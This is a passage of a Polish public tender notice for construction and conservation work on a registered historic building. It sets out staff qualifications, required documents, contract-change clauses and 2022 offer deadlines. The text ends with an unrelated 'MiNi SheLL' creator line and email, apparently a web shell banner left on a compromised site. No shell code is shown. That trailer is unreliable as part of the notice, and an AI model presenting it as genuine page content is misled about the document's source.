spełniony, jeśli Wykonawca wykaże (zał nr 8 do SWZ) min. :<br/>1. Kierownika budowy – ważne uprawnienia do kierowania robotami w branży konstrukcyjno- budowlanej lub równoważnej<br/>bez ograniczeń,<br/>Wymagane są osoby posiadające minimum 5-letnie doświadczenie przy pełnieniu samodzielnych funkcji technicznych w<br/>budownictwie na stanowisku kierownika budowy dla danej specjalności, które będą uczestniczyć w wykonywaniu<br/>zamówienia, w tym z co najmniej 2 letnią praktyką zawodową (doświadczeniem) na budowie przy zabytkach nieruchomych –<br/>należy wykazać min. 2 roboty na zabytkach nieruchomych (rozporządzenie Ministra Kultury i Dziedzictwa Narodowego z<br/>dnia 27.07.2011r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań<br/>konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badan<br/>archeologicznych /Dz. U. z 2011r. nr 165, poz.987 ze zmianami) oraz DZ.U. z 2018 r. poz. 2067, 2245.ze zmianami -<br/>USTAWA z dnia 23lipca 2003r.o ochronie zabytków i opiece nad zabytkami)<br/>2. Osoba uprawniona do kierowania pracami konserwatorskimi, pracami restauratorskimi lub badaniami konserwatorskimi,<br/>prowadzonymi przy zabytkach wpisanych do rejestru zgodnie z art. 37a ust 1 i 2 obowiązującej Ustawy o ochronie zabytków<br/>i opiece nad zabytkami.<br/>Uwaga: Zamawiający uzna także za spełnienie powyższego warunku sytuację, gdzie jedna osoba spełnia dwa powyższe<br/>wymogi.<br/>Zamawiający dopuszcza możliwość potwierdzenia spełniania warunku dot. Dysponowania odpowiednimi osobami również<br/>poprzez wykazanie posiadania wymaganych uprawnień wydanych na podstawie wcześniej obowiązujących niż obecnie<br/>przepisów oraz odpowiadające im uprawnienia wydane Obywatelom państw członkowskich Unii Europejskiej, Konfederacji<br/>Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o<br/>Europejskim Obszarze Gospodarczym oraz innych przepisów ustawy Prawo Budowlane oraz ustawy o zasadach<br/>uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	Zamawiający wymaga wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże (zał. Nr 7) w powyższym zakresie i przy spełnieniu powyższych warunków - wykonanie min. 1 roboty podobnego rodzaju (tj wykonanie robót budowlanych zawierających minimalnie elementy: budowy/przebudowy/remontu dachu, wykonania hydroizolacji ścian- dotyczącej obiektu wpisanego do rejestru zabytków) na kwotę sumaryczną min. 500 000 zł brutto.<br/>UWAGA - zgodnie z udzielonymi odpowiedziami zamawiający dopuszcza (cd. w uwagach ze względu na brak znaków)<br/>b) Zamawiający wymaga wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże (zał nr 8 do SWZ) min. :<br/>1. Kierownika budowy – ważne uprawnienia do kierowania robotami w branży konstrukcyjno- budowlanej lub równoważnej bez<br/>ograniczeń,<br/>Wymagane są osoby posiadające minimum 5-letnie doświadczenie przy pełnieniu samodzielnych funkcji technicznych w<br/>budownictwie na stanowisku kierownika budowy dla danej specjalności, które będą uczestniczyć w wykonywaniu zamówienia, w tym<br/>z co najmniej 2 letnią praktyką zawodową (doświadczeniem) na budowie przy zabytkach nieruchomych – należy wykazać min. 2<br/>roboty na zabytkach nieruchomych (rozporządzenie Ministra Kultury i Dziedzictwa Narodowego z dnia 27.07.2011r. w sprawie<br/>prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i<br/>innych działań przy zabytku wpisanym do rejestru zabytków oraz badan archeologicznych /Dz. U. z 2011r. nr 165, poz.987 zezmianami) oraz DZ.U. z 2018 r. poz. 2067, 2245.ze zmianami - USTAWA z dnia 23lipca 2003r.o ochronie zabytków i opiece nad<br/>zabytkami)<br/>2. Osoba uprawniona do kierowania pracami konserwatorskimi, pracami restauratorskimi lub badaniami konserwatorskimi,<br/>prowadzonymi przy zabytkach wpisanych do rejestru zgodnie z art. 37a ust 1 i 2 obowiązującej Ustawy o ochronie zabytków i opiece<br/>nad zabytkami.<br/>Uwaga: Zamawiający uzna także za spełnienie powyższego warunku sytuację, gdzie jedna osoba spełnia dwa powyższe wymogi.<br/>Zamawiający dopuszcza możliwość potwierdzenia spełniania warunku dot. Dysponowania odpowiednimi osobami również poprzez<br/>wykazanie posiadania wymaganych uprawnień wydanych na podstawie wcześniej obowiązujących niż obecnie przepisów oraz<br/>odpowiadające im uprawnienia wydane Obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw<br/>członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym oraz<br/>innych przepisów ustawy Prawo Budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełnomocnictwo - jeśli wymagane na podstawie obowiązujących przepisó <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty. 2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z<br/>Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianiewarunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu.3. Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane/dostawy/usługi wykonają poszczególni wykonawcy.4. Oświadczenia i dokumenty<br/>potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zamawiający dopuszcza zmiany postanowień zawartej umowy w zakresie:<br/>1) wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową w<br/>sytuacji gdy wykonanie tych robót będzie niezbędne do prawidłowego, tj. zgodnego z zasadami<br/>wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu<br/>umowy i nie spowoduje podniesienia kosztów.<br/>2) rezygnacji z wykonywania części (elementów) przedmiotu umowy przewidzianych w<br/>dokumentacji projektowej w sytuacji, gdy ich wykonanie będzie zbędne do prawidłowego, tj.<br/>zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami<br/>wykonania przedmiotu umowy. Roboty takie nazywane są „robotami zaniechanymi”.<br/>3) zmiany stawki podatku VAT w przypadku urzędowej zmiany stawki podatku VAT,<br/>4) zmiany formy rozliczania np. co do ilości wystawionych faktur, jeśli będzie to akceptowalne<br/>dla Zamawiającego.<br/>5) zmiany formy prawnej Zamawiającego.<br/>6) terminu wykonania oraz przedmiotu zamówienia w niezbędnym zakresie, nie prowadzącym<br/>jednak do zwiększenia jego wielkości lub zakresu i pod warunkiem, że będą one korzystne dla Zmawiającego, o ile będzie to<br/>konieczne z uwagi na nieprzewidziane okoliczności na które<br/>wykonawca nie miał wpływu np. ujawnienie błędów w dokumentacji.<br/>7) zamiany materiałów i urządzeń przedstawionych w ofercie przetargowej pod warunkiem, że<br/>zmiany te będą korzystne dla Zamawiającego. Będą to przykładowo, okoliczności:<br/>a) powodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację i konserwację wykonanego przedmiotu umowy;<br/>b) powodujące poprawienie parametrów technicznych;<br/>c) wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany potrzeb<br/>Zamawiającego lub zmiany obowiązujących przepisów.<br/>Dodatkowo możliwa jest zmiana producenta poszczególnych materiałów i urządzeń<br/>przedstawionych w ofercie przetargowej pod warunkiem, że zmiana ta nie spowoduje obniżenia<br/>parametrów tych materiałów lub urządzeń<br/>8) wszelkich zmian umowy, o ile konieczność ich wprowadzenia będzie wynikała ze zmian<br/>w obowiązujących przepisach prawa.<br/>9) aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących<br/>przepisów,<br/>10) Terminu wykonania w przypadku:<br/>a) przestojów i opóźnień zawinionych przez Zamawiającego, lub innego Wykonawcy<br/>zatrudnionego przez Zamawiającego na terenie budowy, albo z powodu innych przyczyn o<br/>obiektywnym charakterze, których nie dało się wcześniej przewidzieć.<br/>b) działania siły wyższej (na przykład klęski żywiołowe, strajki generalne lub lokalne), mającej<br/>bezpośredni wpływ na terminowość wykonywania robót;<br/>c) wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót – fakt ten<br/>musi zostać zgłoszony Zamawiającemu i musi zostać potwierdzony przez inspektora nadzoru,<br/>d) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo<br/>zachowania należytej staranności;<br/>e) wykopalisk/znalezisk uniemożliwiających wykonywanie robót;<br/>f) podpisania umowy na zamówienia wykraczające poza przedmiot zamówienia podstawowego<br/>o ile wykonywanie tych zamówień wpływa na termin wykonania niniejszej umowy<br/>11) podwykonawców,<br/>(cd. w uwagach!) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-04 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://szczawno-jedlina.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-04 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> cd.Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia:<br/>12) zmiany osób reprezentujących lub wykonujących funkcje kierownicze, pod warunkiem<br/>wcześniejszego powiadomienia drugiej strony, w następujących przypadkach:<br/>a) śmierci, choroby lub innych zdarzeń losowych<br/>b) niewywiązywania się z obowiązków wynikających z umowy<br/>c) jeżeli zmiana stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od<br/>Wykonawcy (np. rezygnacji)<br/>d) wykonawca może dokonywać zmiany Kluczowych Specjalistów, przedstawionych<br/>w ofercie, jedynie za uprzednią pisemną zgodą zamawiającego, akceptującego nowego<br/>Kluczowego Specjalistę<br/>e) wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów w następujących<br/>przypadkach:<br/>- śmierci, choroby lub innych zdarzeń losowych Kluczowego Specjalisty<br/>- nie wywiązywania się Kluczowego Specjalisty z obowiązków wynikających z umowy<br/>- jeżeli zmiana Kluczowego Specjalisty stanie się konieczna z innych przyczyn niezależnych od<br/>Wykonawcy (np. rezygnacji)<br/>f) Zamawiający może żądać od Wykonawcy zmiany Kluczowego Specjalisty, jeżeli uzna, że Kluczowy Specjalista nie<br/>wykonuje swoich obowiązków wynikających z umowy,<br/>g) w przypadku zmiany kluczowego specjalisty, nowy Kluczowy specjalista musi spełniać<br/>wymagania określone dla danego specjalisty.<br/>13) W przypadku, gdy Zamawiający pozostaje w zwłoce w udostępnieniu placu budowy,<br/>wymaganej dokumentacji, termin realizacji zamówienia ulega automatycznie przedłużeniu o ilość dni zwłoki,<br/>w jakiej pozostaje Zamawiający (od dnia powstania zwłoki do dnia protokolarnego przekazania<br/>placu budowy lub określonej dokumentacji). Wystąpienie takiej sytuacji wymaga stosownej<br/>notatki służbowej zaakceptowanej przez inspektora nadzoru oraz Zamawiającego, a także<br/>sporządzenia aneksu do umowy w formie pisemnej pod rygorem nieważności.<br/>14) Zamawiający dopuszcza ewentualne zmiany w zakresie harmonogramu, jeżeli będą one<br/>uzasadnione organizacyjnie i technicznie i będą korzystne dla Zamawiającego pod względem<br/>zapewnienia możliwości realizowania świadczeń medycznych<br/>15) Zmiana formy zabezpieczenia umowy: zmiana przewidziana w art. 149 ust. 1 ustawy Prawo<br/>zamówień publicznych.<br/>16) Zmiana podwykonawców: w przypadku wprowadzenia podwykonawcy, wprowadzenia<br/>nowego (kolejnego) podwykonawcy, rezygnacji podwykonawcy, zmiany wartości lub zakresu<br/>robót wykonywanych przez podwykonawcę, Zamawiający może wyrazić zgodę na powyższe po<br/>zaakceptowaniu umowy Wykonawcy z podwykonawcą wraz z częścią dokumentacji dot.<br/>wykonania robót określonych w umowie.<br/>17) zmiana wynagrodzenia, o którym mowa w § 15 ust. 1 wzoru umowy związana<br/>z koniecznością rezygnacji przez Zamawiającego z wykonania części zamówienia o wartość<br/>wynikającą z kosztorysu<br/>2. Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.

Creat By MiNi SheLL
Email: jattceo@gmail.com